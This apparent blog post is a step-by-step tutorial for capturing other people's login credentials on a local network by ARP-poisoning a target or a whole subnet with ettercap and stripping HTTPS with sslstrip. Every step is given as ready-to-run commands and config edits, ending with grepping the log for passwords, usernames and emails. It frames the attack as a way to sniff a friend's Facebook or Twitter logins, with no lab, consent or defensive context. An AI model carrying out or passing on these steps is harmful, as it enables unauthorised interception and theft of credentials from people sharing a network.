Wanna sniff some Facebook, Twitter or any kind of website under your network or poisoning your friend computer even that website using HTTPS for auth page? Well, ettercap and sslstrip are ready to help.
1. edit /etc/sysctl.conf and add this value,
net.ipv4.ip_forward=1
2. edit /etc/etter.conf, find all this values and change it into like this,
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
3. redirect the traffic,
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
4. poison your target using ettercap,
ettercap -Tq -M arp:remote /192.168.56.134/ -P autoadd
"192.168.56.134" it's your target IP. Or you can do it for everyone in your subnet, but please bear in your mind this can be makes your network very2 slow,
ettercap -Tq -M arp:remote // //
5. run sslstrip. you can download it from http://www.thoughtcrime.org/software/sslstrip/
sslstrip -a -i 8080 -w sslstriplog
6. everything is set! Now just keep your eyes on sslstriplog file,
tailf sslstriplog
7. you can grep it for specific word, such as password, pass, username, email, username_or_email, and etc…. ;)
8. have fun… :)
No comments:
Post a Comment